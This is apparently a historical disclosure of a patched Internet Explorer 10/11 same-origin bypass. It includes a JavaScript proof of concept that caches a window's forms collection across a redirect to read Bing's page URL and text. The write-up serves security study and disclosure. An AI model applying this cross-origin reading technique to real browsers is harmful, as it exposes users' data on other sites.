If you know the name of a form element on the target page, you can access that element’s ownerDocument after a redirect by caching the forms collection before the redirect and then looking up the named form afterward. Bing uses a form called sb_form, which made it a convenient target for demonstrating this technique.

var _forms;

function main() {
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    win.setTimeout('alert("Please, don\'t close this alert");');

    win.document.appendChild(win.document.createElement("form"));
    _forms = win.document.forms; // Save a reference to the forms collection.

    setTimeout("accessFormsCollection()", 2000);
}

function accessFormsCollection() {
    try {
        alert(_forms);
    } catch (e) {
        alert(_forms.sb_form.ownerDocument.URL + "\n\n" +
              _forms.sb_form.ownerDocument.body.innerText);
    }
}

The first access to _forms throws an exception; the catch block accesses _forms.sb_form — the named form from Bing’s page — and from there navigates to ownerDocument, giving full DOM access. Tested on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.